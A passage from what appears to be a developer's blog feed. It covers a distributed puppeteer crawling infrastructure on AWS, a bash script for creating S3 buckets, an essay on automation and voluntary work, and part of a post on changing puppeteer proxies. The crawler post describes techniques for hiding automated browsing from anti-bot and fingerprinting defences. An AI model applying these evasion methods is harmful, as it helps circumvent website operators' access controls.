<p>However, if you are already an experienced scraping script author, you might have encountered the following limitations:</p>
<ol>
<li>If you run the crawling script on your development machine, you will <strong>need to keep the machine running as long as the task is not finished.</strong> That is annoying.</li>
<li>If you are using a VPS to run your crawling script, you don't have to worry about the execution time of your crawling program. However, your VPS only scales vertically. What if you want to control more than three browsers at the same time? This becomes increasingly expensive in terms of RAM and CPU costs. Therefore, running a large crawling operation on one single server instance is not scalable.</li>
<li>When you store the crawled data in a database, disk space becomes an issue if you are launching large tasks. Therefore, at some point you will need to outsource storage to the cloud.</li>
</ol>
<p>In summary, if you want to run multiple long-running and computationally expensive crawling jobs concurrently, the distributed crawling infrastructure presented in this article might be for you.</p>
<h2>The problems that the distributed crawling infrastructure solves</h2>
<p>In the following sections, I outline some of the problems and hurdles the crawling infrastructure tackles.</p>
<h3>Handling of large data-sets</h3>
<p>The crawling infrastructure stores crawled data in compressed form in the cloud. Currently, the most used storage solution is AWS S3. But you can store the crawled data in any cloud storage of your choice.</p>
<p>That way you don't have to worry about local storage restrictions.</p>
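<p>To illustrate what "compressed form" can mean in practice, here is a small sketch that gzips an HTML document with the Node.js <code>zlib</code> module before it is handed to an uploader. The function names and the key layout <code>{taskId}/{itemId}.html.gz</code> are assumptions for illustration and are not taken from the project.</p>

```javascript
const zlib = require('zlib');

// Compress an HTML document before uploading it to cloud storage.
function compressDocument(html) {
  return zlib.gzipSync(Buffer.from(html, 'utf8'));
}

// Reverse operation, used when the stored documents are analyzed later.
function decompressDocument(buffer) {
  return zlib.gunzipSync(buffer).toString('utf8');
}

// Hypothetical key layout for the stored object.
function storageKey(taskId, itemId) {
  return taskId + '/' + itemId + '.html.gz';
}
```

<p>The compressed buffer and the key would then be passed to the client of whichever cloud storage is used.</p>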
<h3>Dynamic allocation of crawling backends</h3>
<p>The crawling infrastructure gives you full choice over the computational resource that executes the crawling code. By default, the crawling worker is executed on AWS Lambda instances, but you could use any other backend such as</p>
<ol>
<li>AWS EC2 Spot instances</li>
<li>Azure cloud functions</li>
<li>Digital Ocean Droplets</li>
</ol>
<h3>Detection of the crawling</h3>
<p>A major contribution of the distributed crawling software is its attempt to hide the automated crawling from bot detection approaches. For that reason, the crawling infrastructure uses a Chromium browser controlled by puppeteer and configures the browser in a way that makes it hard for anti-bot techniques and fingerprinting scripts to detect it.</p>
<p>A wide array of techniques is used, such as user agent obfuscation, changing HTTP headers such as Accept-Language, proxy support, setting Chrome command line parameters and much more.</p>
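<p>A few of these techniques can be sketched with puppeteer's public API. This is not the code of the crawling infrastructure, only an illustration: the helper names and the <code>settings</code> object are hypothetical, while <code>page.setUserAgent()</code>, <code>page.setExtraHTTPHeaders()</code> and the <code>args</code> launch option are regular puppeteer features.</p>

```javascript
// Build the options object for puppeteer.launch().
// `settings` is a hypothetical configuration object.
function buildLaunchOptions(settings) {
  const args = ['--lang=' + settings.language];
  if (settings.proxy) {
    // Route all browser traffic through the given proxy.
    args.push('--proxy-server=' + settings.proxy);
  }
  return { headless: settings.headless, args: args };
}

// Apply per-page settings before navigating to the target.
async function disguisePage(page, settings) {
  await page.setUserAgent(settings.userAgent);
  await page.setExtraHTTPHeaders({ 'Accept-Language': settings.acceptLanguage });
}

// Usage, assuming puppeteer is installed:
//   const puppeteer = require('puppeteer');
//   const browser = await puppeteer.launch(buildLaunchOptions(settings));
//   const page = await browser.newPage();
//   await disguisePage(page, settings);
```

<p>These settings alone will not defeat serious fingerprinting scripts. They only show where such configuration hooks in.</p>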
<h3>Separation of Concerns</h3>
<p>Because the crawling infrastructure is split into five distinct components, it is straightforward to debug.
Distributed systems are complicated by design. Therefore, separating such software into individual components reduces this complexity.</p>
<h2>Requirements for installing & controlling the crawling infrastructure</h2>
<p>Running your own scalable crawling infrastructure only makes sense if the following conditions are met:</p>
<ol>
<li>You own an AWS/Azure/Google Cloud account</li>
<li>You need to execute long-running crawl tasks over hundreds of thousands or millions of items</li>
<li>You know the implications of what you are doing</li>
</ol>
<p>In order to follow this tutorial, you will at least <strong>require an
AWS account</strong>. We will make use of the following AWS services:</p>
<ul>
<li><strong>AWS Lambda</strong> as crawling backend</li>
<li><strong>AWS S3</strong> to store crawled Html data</li>
<li>An <strong>AWS EC2</strong> instance used as a master server that schedules the crawl task and hosts the mongodb that we use as a queue. This is the central part of the crawling infrastructure.</li>
</ul>
<h2>The architecture of the crawling infrastructure</h2>
<p>The whole codebase is written in TypeScript, which eliminates some of the problems that large Node.js projects inevitably run into as they grow.
The architecture of the crawling infrastructure is divided into five parts.</p>
<ol>
<li><strong>The Api</strong> that accepts, lists, deletes and manages crawl tasks.</li>
<li><strong>A scheduler</strong> that polls the database for pending crawl tasks and launches worker instances if there is more crawling work to do.</li>
<li><strong>A mongodb database instance</strong> that stores crawling metadata and the items to be crawled. No actual results will be stored in the database, only crawling metadata. The database needs to be remotely accessible.</li>
<li><strong>The crawling worker</strong>. When a crawling worker is launched, it grabs items from the database and makes progress on them. The crawling worker implements all the logic responsible for launching a browser, making it undetectable and executing the crawling logic.</li>
<li><strong>The crawling function</strong>. This is the logic that defines what should be done on the crawled website. For example, if you want to scrape Google, the <a href="">Google Scraper</a> would be chosen as the crawling function. On the other hand, if you only want to render & store the HTML of a website, a <a href="">simple render</a> crawling function suffices.</li>
</ol>
<p>The architecture of the crawling infrastructure is quite complex and is summarized in the diagram below:</p>
<p><img alt="architecture of the crawling infrastructure" src="https://github.com/NikolaiT/Crawling-Infrastructure/raw/master/docs/diagram/arch_diagram2.png" title="crawling infra arch"></p>
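<p>To make the role of the scheduler more concrete, here is a strongly simplified sketch of one polling round. It is not taken from the project's code: the rule in <code>workersToLaunch()</code>, the <code>queue</code> object with its two methods and the <code>launchWorker</code> callback are hypothetical stand-ins for the mongodb queue and the worker backend.</p>

```javascript
// Hypothetical rule: launch enough workers for the pending items, but never
// exceed the configured maximum of concurrently running workers.
function workersToLaunch(pendingItems, runningWorkers, itemsPerWorker, maxWorkers) {
  const needed = Math.ceil(pendingItems / itemsPerWorker);
  const free = Math.max(0, maxWorkers - runningWorkers);
  return Math.min(needed, free);
}

// One polling round of the scheduler. `queue` and `launchWorker` are
// injected so that the logic does not depend on a concrete backend.
async function schedulerTick(queue, launchWorker, config) {
  const pending = await queue.countPending();
  const running = await queue.countRunningWorkers();
  const count = workersToLaunch(pending, running, config.itemsPerWorker, config.maxWorkers);
  for (let i = 0; i < count; i++) {
    await launchWorker();
  }
  return count;
}
```

<p>A real scheduler would call such a function periodically and would also have to deal with workers that crash without reporting back.</p>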
<h2>Practical part: Launching the first crawl task</h2>
<p>Now that we have introduced the crawling infrastructure from a theoretical point of view, it's time to start with something practical: We will test the <strong>crawler</strong> and then create the first simple crawl tasks locally.</p>
<p>Therefore, we won't create a distributed infrastructure just yet. That is saved for the two other parts of this tutorial.</p>
<p>In order to follow this excursion, you will need to have installed the following software:</p>
<ol>
<li>Nodejs, check out the <a href="https://linuxize.com/post/how-to-install-node-js-on-ubuntu-18.04/">installation instructions</a></li>
<li><code>typescript</code>, installed globally with <code>sudo npm install -g typescript</code></li>
<li>docker, see Ubuntu 18.04 <a href="https://www.digitalocean.com/community/tutorials/how-to-install-and-use-docker-on-ubuntu-18-04">installation instructions</a></li>
<li><code>npm</code> and <code>yarn</code></li>
</ol>
<p>If that is the case, go to a cozy place on your local file system and download the crawling infrastructure project with the command:</p>
<div class="highlight"><pre><span></span><code>git clone https://github.com/NikolaiT/Crawling-Infrastructure.git
<span class="nb">cd</span> Crawling-Infrastructure/
</code></pre></div>
<p>In order to test the crawler, we use the following commands to create the docker crawler image.</p>
<div class="highlight"><pre><span></span><code><span class="nb">cd</span> crawler/
npm install
<span class="c1"># install & compile lib</span>
<span class="nb">cd</span> ../lib
npm install
tsc
<span class="nb">cd</span> ../crawler
./build.sh
</code></pre></div>
<p>After the image has been built successfully, you can run the integration test with the following command:</p>
<div class="highlight"><pre><span></span><code>mocha --timeout <span class="m">300000</span> -r ts-node/register test/integration_tests.ts
</code></pre></div>
<p>The mocha tests should run successfully. If that is the case, we may proceed with running some local crawl tasks against the running docker image.</p>
<h3>Testing the crawler locally</h3>
<p>Now that we have successfully tested the crawler locally, let's see if we can actually crawl a simple url with it.</p>
<p>First launch the docker crawler image in one terminal window with the following command:</p>
<div class="highlight"><pre><span></span><code>docker run -p <span class="m">4444</span>:4444 --env <span class="nv">PORT</span><span class="o">=</span><span class="m">4444</span> tschachn/crawl_worker:latest
<span class="o">[</span>DOCKER<span class="o">]</span> Starting X virtual framebuffer using: Xvfb :99 -ac -screen <span class="m">0</span> 1280x720x16 -nolisten tcp
<span class="o">[</span>DOCKER<span class="o">]</span> Starting worker server
CrawlWorker<span class="o">[</span>6c279a53f03d<span class="o">]</span> with pid <span class="m">9</span> listening on port <span class="m">4444</span>
</code></pre></div>
<p>And now on a second terminal window, confirm that the crawler docker image is running by issuing the following command:</p>
<div class="highlight"><pre><span></span><code>curl http://localhost:4444/
<span class="o">{</span>
<span class="s2">"status"</span>: <span class="m">200</span>,
<span class="s2">"message"</span>: <span class="s2">"Welcome to CrawlWorker running on 6c279a53f03d"</span>,
<span class="s2">"version"</span>: <span class="s2">"1.1.5"</span>,
<span class="s2">"author"</span>: <span class="s2">"Nikolai Tschacher <contact@scrapeulous.com> (https://scrapeulous.com)"</span>
<span class="o">}</span>
</code></pre></div>
<p>Everything works fine! Now it's time to crawl a simple website that reflects our IP address. As you can see, we pass an empty AWS configuration.</p>
<div class="highlight"><pre><span></span><code>curl http://localhost:4444/invokeRequestResponse <span class="se">\</span>
-H <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span>
-d <span class="s1">'{"API_KEY": "kfTP6E7GgDTtIBZnUQq4skrHGWcuPe1Z",</span>
<span class="s1"> "aws_config": {</span>
<span class="s1"> "AWS_ACCESS_KEY": "",</span>
<span class="s1"> "AWS_SECRET_KEY": "",</span>
<span class="s1"> "AWS_REGION": "",</span>
<span class="s1"> "AWS_BUCKET": ""</span>
<span class="s1"> },</span>
<span class="s1"> "local_test": true,</span>
<span class="s1"> "function_code": "class Get extends HttpWorker { async crawl(url) { let result = await this.Got(encodeURI(url)); return result.body; } }",</span>
<span class="s1"> "items": ["https://ipinfo.io/json"]}'</span>
</code></pre></div>Dynamic creation of S3 buckets in many regions2020-02-26T17:50:00+01:002020-02-26T17:50:00+01:00Nikolai Tschachertag:incolumitas.com,2020-02-26:/2020/02/26/dynamic-s3-bucket-creation-in-many-regions/<p>Quick script that demonstrates how to create s3 buckets in many regions.</p><h2>Create S3 buckets dynamically with a bash script</h2>
<p>The script below creates S3 buckets in the AWS regions that are specified at the beginning of the script.</p>
<p>Just edit the array named <code>regions</code> and modify the slug and the script will create buckets in the form <code>{slug}-{aws-region}</code> in all the regions specified.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env bash</span>
<span class="c1"># create_s3_buckets.sh</span>
<span class="c1"># Author: Nikolai Tschacher</span>
<span class="nv">regions</span><span class="o">=(</span>us-east-2 us-east-1 eu-central-1 eu-west-1 eu-west-2 eu-west-3<span class="o">)</span>
<span class="k">for</span> region <span class="k">in</span> <span class="s2">"</span><span class="si">${</span><span class="nv">regions</span><span class="p">[@]</span><span class="si">}</span><span class="s2">"</span>
<span class="k">do</span>
<span class="c1"># specify your bucket name here</span>
<span class="nv">bname</span><span class="o">=</span><span class="s2">"slug-</span><span class="nv">$region</span><span class="s2">"</span>
<span class="nb">echo</span> <span class="s2">"creating </span><span class="nv">$bname</span><span class="s2"> aws bucket"</span>
<span class="c1"># https://docs.aws.amazon.com/cli/latest/reference/s3api/create-bucket.html#examples</span>
<span class="k">if</span> <span class="o">[[</span> <span class="s2">"</span><span class="nv">$region</span><span class="s2">"</span> <span class="o">==</span> <span class="s2">"us-east-1"</span> <span class="o">]]</span><span class="p">;</span> <span class="k">then</span>
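aws s3api create-bucket --bucket <span class="s2">"</span><span class="nv">$bname</span><span class="s2">"</span> --region <span class="s2">"</span><span class="nv">$region</span><span class="s2">"</span> --acl private
<span class="k">else</span>
aws s3api create-bucket --bucket <span class="s2">"</span><span class="nv">$bname</span><span class="s2">"</span> --region <span class="s2">"</span><span class="nv">$region</span><span class="s2">"</span> --acl private --create-bucket-configuration <span class="nv">LocationConstraint</span><span class="o">=</span><span class="s2">"</span><span class="nv">$region</span><span class="s2">"</span>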
<span class="k">fi</span>
<span class="k">done</span>
</code></pre></div>
<p>Run the script with the following commands:</p>
<div class="highlight"><pre><span></span><code>chmod +x create_s3_buckets.sh
./create_s3_buckets.sh
</code></pre></div>The value of work in the coming decades2020-02-20T01:37:00+01:002020-02-21T13:05:00+01:00Nikolai Tschachertag:incolumitas.com,2020-02-20:/2020/02/20/the-value-of-work-in-the-coming-decades/<p>This article makes an attempt to understand and predict the <strong>consequences of the rapid automation/computerization</strong> in the realm of human work. I make them based on my experiences as a software engineer, while I am fully aware that programming is not threatened to be eradicated by automation in the next decades. For that reason, I realize that I am holding a privileged position. </p>
<p>In the second part of the article, I argue <strong>why work in general should be voluntary</strong> within a welfare state and why the government's main task should be to create a situation where humans don't have to work in order to obtain the bare essentials such as housing, food and healthcare.</p>
<h2>What is work?</h2>
<p>So what exactly is work? Work is something that sucks, right? After all, if I could spend my time without having to worry about finances, I'd rather spend my days at a tropical beach drinking some beers and doing <strong>exactly nothing</strong>.</p>
<p>But for how long? When would my natural urge to be productive kick in? I assume that after a couple of days, I would start a project that consumes my time. But since I don't have to worry about its financial merits, can it really be considered <em>work</em>?</p>
<p>My attempt to define work is the following:</p>
<ol>
<li>Work pays the bills.</li>
<li>Work is something that produces value for the recipient of effort.</li>
<li>The amount of money that work generates usually correlates with the amount of value it produces.</li>
</ol>
<h2>What if some people stop producing value?</h2>
<p>One of the fundamental issues of our modern times is the fact that our society becomes more complex with each passing day. It's practically impossible to grasp even narrow professional fields in their entirety. People in their professions are usually extremely specialized.</p>
<p>Navigating successfully within a certain industry requires years of education and training. In the next decades, there will be an enormous demand for this workforce. But there is only a certain percentage in the population that has the </p>
<ol>
<li>Motivation, discipline and interest</li>
<li>Required cognitive ability and health</li>
<li>Stable socio-economic background</li>
</ol>
<p>to become a highly sought-after specialist. For some percentage of the population, those jobs will be <strong>unattainable</strong>. I don't know how high this percentage is, but I assume it's between 20% and 70% of a given country's population and therefore significant.</p>
<p>Right now, this is not such a huge problem, because there is still enough labour that doesn't require specialized skills. However, what happens when employees in fast food chains lose their jobs because <a href="https://streetfightmag.com/2019/04/11/measuring-the-impact-of-mcdonalds-push-into-automation-personalization/">McDonald's decides to fully automate its restaurants</a>?</p>
<p>What happens when the whole retail sector, which still amounts to one of the most prevalent job sources in industrialized countries, <a href="https://www.theguardian.com/technology/2017/aug/16/retail-industry-cashier-jobs-technology-unemployment">decides to lay off a large percentage of their employees</a> because retail jobs are no longer in demand?</p>
<p>For example, <a href="https://www.youtube.com/watch?v=tPslcAKK8Uc">Amazon Go</a> launched around 25 stores that have so-called <strong>Just Walk Out Technology</strong>. Even though Amazon's forecasts for the number of Go stores were too optimistic, the company has proven that supermarkets without cashiers and with fully automated checkout technology are technically possible.</p>
<p>Right now, the checkout process might be <a href="https://www.youtube.com/results?search_query=amazon+go+exploit">exploitable to some degree</a>, but the technology will be fully mature in the coming decade.</p>
<p>Those developments don't suddenly imply that supermarkets and fast food chains won't require employees anymore. It means that a supermarket can be run with <strong>two employees instead of five</strong>.</p>
<p>What happens when the people that got laid off have a hard time finding new jobs? Realistically, workers probably won't have any issue finding new employment, since the unemployment rate in the US is at a record low in 2020. Therefore, unemployment caused by automation does not put people into hopeless job situations in the labour market of our current time. </p>
<p>However, the underlying shift towards automation and digitization will only pick up momentum, and societies will gradually switch to labour systems where low skilled cognitive work is no longer sought after. Simple as that. It doesn't matter if it takes another ten, twenty or thirty years, but I can guarantee that in the next decades, maybe even as far away as the year 2050, <strong>automation and technology advances will cause radical changes</strong> in the labour market:</p>
<ol>
<li>Truck driving on highways will be fully automated by the year 2050. Logistics within cities will probably be partially automated.</li>
<li>Supermarkets, fast food chains, buses, taxis will be partially autonomous.</li>
<li>Most low skilled work in factories will be automated, as is already the case.</li>
<li>Some subfields in medicine and law will be automated. For instance, some surgeries are already heavily assisted with <a href="https://en.wikipedia.org/wiki/Robot-assisted_surgery">surgery robots</a>.</li>
<li>Areas in software development could be partially replaced with AI, such as UI generation, testing and other fields.</li>
</ol>
<h2>What jobs are safe?</h2>
<p>There is a requirement for human intelligence amidst automated processes. For example, you cannot run a supermarket without at least one or two employees, regardless of the level of automation.</p>
<p>What happens when a child crashes into shelves at the supermarket? Who cleans up the mess and refills the shelves? Who puts items back onto their proper shelves when they were left in the wrong place? Who stops people from manipulating the check-out technology in supermarkets? Who repairs said technology?</p>
<p>The same applies to cleaning services. Smart cleaning robots might learn how to vacuum large hotel complexes on their own, but they will always get stuck, even if the cause is not self-inflicted. Cleaning a room is an immensely complex task. I don't think that there will be a viable general purpose cleaning machine that can handle all the complexities and nuances of cleaning arbitrary hotel rooms in the next 30 years.</p>
<p>It seems that the general rule of automation is: <strong>The more you control and design the work environment, the easier it is to automate</strong>.</p>
<p>Real life is simply too complex to successfully automate all work processes. Therefore, it's realistic to say that job fields heavily affected by automation will require fewer human employees with a broader technical skillset. Nevertheless, it still holds true that a large percentage of low skill labour will no longer be in demand.</p>
<p>There will be an extremely <strong>high demand for nurturing and emotional work</strong> such as in health care and psychology. Jobs in nursing, social work and in retirement homes should not be automated, because doing so would disregard basic ethics and human dignity.</p>
<p>Furthermore, in the coming decades, there will be an enormous demand for all kinds of engineers, information technology professionals, scientists, medical professionals and managers. Content creation, entertainment and the service industry will also require a lot of people.</p>
<p>Moreover, simply because some jobs can be automated doesn't mean that they will go away. After all, efficiency is not the sole criterion when it comes to a sound business plan.</p>
<h2>The value of work</h2>
<p>Now that it has been established that modern societies have a large demand for highly specialized work, the purpose of this essay becomes clearer.</p>
<p>In modern capitalist countries, <strong>I assume that roughly 20% of the workforce accounts for 80% of real value generated (Pareto principle)</strong>. This is a bold and problematic claim, since it appears to diminish the work of so many people.</p>
<p>Let me explain.</p>
<p>What I mean by that is that companies in industries that can be scaled horizontally require a constant number of employees who produce an arbitrarily large amount of output. Examples?</p>
<ol>
<li><strong>BMW</strong>, a well-known German car manufacturer, employed 134 thousand people and produced around 2.5 million cars in 2018 with a revenue of 97 billion Euros. This means that on average, one employee of BMW was responsible for around <strong>724k Euros in annual revenue</strong>. </li>
<li><strong>Alphabet Inc.</strong>, the conglomerate behind Google, employed 118k people in 2019 and had an annual revenue of 161 billion Dollars. It follows that on average an Alphabet Inc. employee was responsible for <strong>1.36 million Dollars in revenue</strong> in 2019.</li>
<li><strong>Royal Dutch Shell</strong> had 82 thousand employees in 2018 with 388 billion Dollars in revenue. It follows that the average Shell employee brought in <strong>4.7 million Dollars in revenue</strong> in the year 2018.</li>
</ol>
<p>[Sources: Wikipedia]</p>
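<p>The per-employee figures are plain divisions of revenue by headcount. A minimal sketch that recomputes them from the numbers quoted in the list (the names <code>companies</code> and <code>revenuePerEmployee</code> are only illustrative) gives roughly 0.72, 1.36 and 4.73 million per employee:</p>

```javascript
// Figures as quoted in the list above: annual revenue and number of employees.
const companies = [
  { name: 'BMW', revenue: 97e9, employees: 134e3, currency: 'EUR' },
  { name: 'Alphabet Inc.', revenue: 161e9, employees: 118e3, currency: 'USD' },
  { name: 'Royal Dutch Shell', revenue: 388e9, employees: 82e3, currency: 'USD' },
];

// Revenue per employee is total revenue divided by headcount.
function revenuePerEmployee({ revenue, employees }) {
  return revenue / employees;
}

for (const company of companies) {
  const perHead = Math.round(revenuePerEmployee(company));
  console.log(`${company.name}: ${perHead.toLocaleString('en-US')} ${company.currency} per employee`);
}
```

<p>Keep in mind that this is revenue, not profit or value added, so it only serves as a rough indicator of how well a business scales.</p>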
<p>What does that mean? Does it mean that a Shell employee produces more value than a teacher in a public school? After all, the teacher probably has a net revenue of <strong>-50,000 dollars annually</strong>, paid by the taxpayer.</p>
<p>However, the teacher's work is indispensable, because without it, there wouldn't be educated people working in the highly successful companies above. If the companies educated their workforce themselves, it would be possible to put a tangible number on the value generated by teachers.</p>
<p>Let's assume you are one of the many low paid workers such as cashiers or cleaning personnel. Those jobs pay around 12.50 Dollars per hour, which puts their annual income at roughly 24 thousand dollars. How does 24,000 Dollars compare to 115,000 Dollars in the case of the <a href="https://www.payscale.com/research/US/Employer=Google%2C_Inc./Salary">average Google salary</a>? It's absurd.</p>
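<p>The annual figure follows from the hourly wage once a working schedule is fixed. The sketch below assumes 40 hours a week and 48 paid weeks a year. That schedule is an assumption and is not stated in the text, but it reproduces the figure of about 24,000 dollars and shows how far it is from the quoted Google average:</p>

```javascript
// Assumed full-time schedule (not given in the article): 40 hours a week, 48 paid weeks a year.
const HOURS_PER_WEEK = 40;
const WEEKS_PER_YEAR = 48;

// Annual income for a given hourly wage under the assumed schedule.
function annualIncome(hourlyWage) {
  return hourlyWage * HOURS_PER_WEEK * WEEKS_PER_YEAR;
}

const lowWageIncome = annualIncome(12.5); // 12.50 dollars per hour, as in the text
const googleAverage = 115000;             // average Google salary quoted in the text

console.log(`Low paid job: ${lowWageIncome} dollars per year`);
console.log(`Google average is ${(googleAverage / lowWageIncome).toFixed(1)} times higher`);
```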
<p>Put differently, the value of work depends on how scalable and sought after the nature of your work is.</p>
<p>There is no easy solution here. People are differently gifted, distinctly lucky and from different socio-economic backgrounds. There will never be equality in that sense. The modern capitalistic system creates an enormous pressure on individuals to compete with each other. There is a global market for virtually any service and material good.</p>
<p>It is easy to see that the extremely competitive global capitalistic system yields a small percentage of highly successful companies that are the winners of the global market. The same applies to the workforce. </p>
<h2>Working harder?</h2>
<p>The individual solution seems to be the mantra of working harder, getting a better education and being more competitive. That's all nonsense, since <strong>the globalized market doesn't care about your individual effort</strong>. It will always reward the top tier companies and workers, while the lower ranks are left empty-handed.</p>
<p>When you are immensely driven, have the luck to come from a good socio-economic background and are intelligent enough, the competitive world embraces you with open arms. However, for many people, this relentless competition is not very attractive and they choose not to participate in it.</p>
<p>After all, why is it purposeful to always strive for more money, more consumerist goods and more status symbols? </p>
<p><strong>It seems to me that the allure of what money can buy is limited to the freedom to not participate in the hamster wheel anymore.</strong></p>
<p>So what is the solution?</p>
<h2>The work is already done</h2>
<p>The work is done. It's time to enjoy the benefits of centuries of hard work of humanity.</p>
<p>I am not an economist, nor do I have a deep understanding of socio-economic systems, but let's take a huge leap back in time and look at what work was for stone age societies.</p>
<p>Our ancestors needed <strong>safety and food</strong>. When they were attacked, they tried to defend themselves, and when they were hungry, they either looked for fruits, nuts or plants or they hunted animals. When they moved from one place to another, they needed to carry the few belongings they had to the next place.</p>
<p>So work for them was mostly gathering enough nutrients, surviving threats and finding a suitable cave/shelter.</p>
<p>Isn't it possible right now to provide exactly that for all citizens of rich countries for free?! The government's main task should be to provide the bare essentials:</p>
<ol>
<li>Food and water</li>
<li>Housing </li>
<li>Education and Health</li>
<li>Maybe a monthly basic income of $400 on top of that</li>
</ol>
<p>for free to everyone in the country that doesn't hold a job which generates more money.</p>
<p>Let me be perfectly clear about that: <strong>If a citizen does not want to work, they should have the option to receive the bare minimum in order to survive without any obligations</strong>.</p>
<p>Of course such a policy would create all sorts of problems:</p>
<ol>
<li>People that don't work might become depressed and lose perspective. However, if they find purpose in work, they can always look for a job in demand or do charitable work. They can do purposeful jobs without having the burden of profitability.</li>
<li>Some people would attempt to cheat the system by renting out the free housing or selling the food in order to buy alcohol or drugs.</li>
<li>Some people would damage government property by neglecting the housing or deliberately destroying it.</li>
</ol>
<p>For cases 2) and 3), the government should impose penalties such as jail time. However, the main idea should not be punishment; the aim should be to support and help.</p>
<h2>How to finance it?</h2>
<p>Well, the social system that I describe above is already in place in many countries in Europe such as Germany. It is mostly paid for by tax income from companies and the medium to high earning middle class. The only difference is that <strong>the government mindlessly forces unemployed people to find new jobs</strong>, despite the fact that the work does not produce any value. The mantra apparently is: We want you to work, and it doesn't matter whether the work is meaningful. The structuring element of work is supposedly enough.</p>
<p>I think this stubborn and totally senseless requirement to force people to work is completely outdated. It should be a human right to have the bare necessities to survive in your country. <strong>Nobody should be able to force you to do work and put pressure on you</strong>. Nobody should have the right to stigmatize you based on the fact that you don't share the same Puritan work ethic. </p>
<p>Of course, if you choose not to work, <strong>you won't be allowed to:</strong></p>
<ol>
<li>Own a car or motorbike</li>
<li>Go on vacation or fly</li>
<li>Buy fancy material objects</li>
</ol>
<p>Nor should you ever have a right to any other luxuries. The government's main task is to provide you with the bare necessities, while it should try to avoid creating new slums and ghettos through large housing projects.</p>
<p>Furthermore, the government should be allowed to force children to attend school for at least 9 years and make university tuition free.</p>
<h2>Benefits of not working</h2>
<p>What are the benefits of such a pressure free environment where your health, housing and food are guaranteed to be provided for?</p>
<p>First of all, you can freely choose to work in whatever fields you want. You can pursue your real passions, even if your sole passion in life might be to chill in bed all day long and do nothing.</p>
<p>If you want to work, there is always enough volunteering work to do in hospitals, elderly homes, parks or other public institutions. Maybe the government <strong>should even have the right to force the people to do such charitable work for 12 hours a week, when they decide not to work</strong>. I am not sure about that.</p>
<p>And most people will choose to find a job so that they can afford to go on vacation, buy consumerist goods or rent nice apartments. Those things are incentive enough for the majority of the population to find a profitable job. <strong>However, bare survival should not be an incentive to work!</strong></p>
<h2>Problems of people not working</h2>
<p>There is a range of possible scenarios that could play out if the supply of low skilled workers rapidly decreased. This workforce would be inclined to no longer work low paid jobs, because the free government assistance would provide the same purchasing power as the income from low paying jobs. So what would happen as a consequence?</p>
<p>Companies <strong>would increase the salary of low paid jobs</strong> while simultaneously increasing the prices of their goods. Hence, a supermarket would still have cashiers and they would be paid better, but the items in the supermarket would be more expensive. However, because the workers are paid more, the incentive and pressure to automate those business processes would rapidly increase. This means that at some point, there will be supermarkets that are almost fully automated and the prices of the items can be decreased again to beat the competition. The competition either adapts or is defeated.</p>
<p>Another option is that the workforce from economically weaker countries will immigrate to those countries in order to do the jobs. This should be made illegal by the government, because it doesn't change the underlying problem.</p>
<p>Alternatively, if worker immigration was legal, the immigrants should have the same benefits as the citizens. Then the same scenario as above would happen. Therefore, immigration doesn't matter in this thought experiment.</p>
<h2>What if automation does not reduce the quantity of work?</h2>
<p>There are many experts that predict that automation and digitalization <a href="https://www.nature.com/articles/d41586-018-07501-y">will not reduce the overall quantity of work</a>. Instead, it will merely shift the labour markets in a direction that requires workers to have better educations, higher skill sets and more specific skills.</p>
<p>For example, <a href="https://www.nature.com/articles/d41586-018-07501-y">around 40% of the workforce</a> was employed in agriculture in the year 1900. Nowadays, only 2% of the US population works in agriculture. Does this mean that millions of people are no longer employed? Not at all, other sectors emerged and new business fields opened and demanded a large workforce. </p>
<p>Therefore, it can be argued that increased computerization leads to more demand in work, not less. As long as we don't have General Artificial Intelligence, the human brain is simply not exchangeable. And it's highly dubious that we ever reach the point of singularity.</p>How to dynamically change http/s proxy servers in puppeteer?2020-02-14T14:06:00+01:002020-02-14T14:06:00+01:00Nikolai Tschachertag:incolumitas.com,2020-02-14:/2020/02/14/dynamically-changing-puppeteer-http-proxy/<p><strong>Find the <a href="https://incolumitas.com/2020/12/20/dynamically-changing-puppeteer-proxies/">updated blog post here.</a></strong></p>
<p>Chrome/Puppeteer has a couple of annoying issues when trying to use <strong>http/s proxies</strong> and <strong>socks proxies</strong> with the chrome browser controlled by puppeteer. The most pressing issues are the following:</p>
<ol>
<li><strong>Dynamically changing proxy servers: </strong> Once the chrome browser is started, it is not possible to change the proxy configuration any longer. A restart is required to switch proxy configuration.</li>
<li><strong>user/pass proxy authentication:</strong> The chrome browser does not support username/password proxy authentication <strong>for socks proxies</strong>. Puppeteer supports the http <a href="">proxy authentication</a> via the <code>page.authenticate()</code> function, but it does not have an equivalent for socks proxies.</li>
<li><strong>Per page proxies: </strong> Per page proxies are not supported with the chrome browser. The global proxy configuration applies to all pages and windows of a launched chrome process. It seems like the new module <a href="https://github.com/Cuadrix/puppeteer-page-proxy">puppeteer-page-proxy</a> tries to solve this issue.</li>
</ol>
<p>For my purposes, I don't really care about problem 3). I don't need per page proxies anyway, since the crawling software I write runs with one browser tab at a time. However, solving issue 1) is a mandatory requirement for me.</p>
<p>The reason is that I don't want to restart the browser each time I need to change the proxy. Some sites require a different proxy for each url. This would force a restart for each url, which prolongs the crawling process significantly.</p>
<p>It seems that the company Apify encountered problems with proxy authentication and thus released an intermediary Node.js proxy server that forwards proxy connections to the real proxy server. They created it back when <code>page.authenticate()</code> was not a part of puppeteer yet and made the following scenario possible:</p>
<div class="highlight"><pre><span></span><code>[Chrome with command line arg proxy-server=localhost:8000]
<===>
[Forwarding proxy server running on localhost:8000]
<===>
[Arbitrary proxy server requiring username:password auth]
</code></pre></div>
<p>The software is called <a href="https://github.com/apifytech/proxy-chain">proxy-chain</a> and there is an informative <a href="https://blog.apify.com/how-to-make-headless-chrome-and-puppeteer-use-a-proxy-server-with-authentication-249a21a79212">blog article that explains how the software works</a>.</p>
<p>However, the current version of <code>proxy-chain</code> only solves the issue with proxy authentication. What we really want is to <strong>dynamically change the browser proxy within our puppeteer code</strong>.</p>
<p>In the remainder of the article our http/s proxy server will have the proxy string <strong>http://proxyuser:proxypassword@100.100.100.100:3128</strong></p>
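<p>A proxy string of this form is an ordinary URL, so its parts can be pulled apart with the WHATWG <code>URL</code> class that ships with Node.js. The following is only a small sketch. The helper name <code>parseProxyString</code> is made up for illustration and is not part of puppeteer or <code>proxy-chain</code>:</p>

```javascript
// The example proxy string used throughout the article.
const proxyString = 'http://proxyuser:proxypassword@100.100.100.100:3128';

// Hypothetical helper: splits a proxy string into its components.
function parseProxyString(value) {
  const url = new URL(value);
  return {
    scheme: url.protocol.replace(/:$/, ''),      // 'http:' -> 'http'
    username: decodeURIComponent(url.username),  // credentials are percent-encoded in URLs
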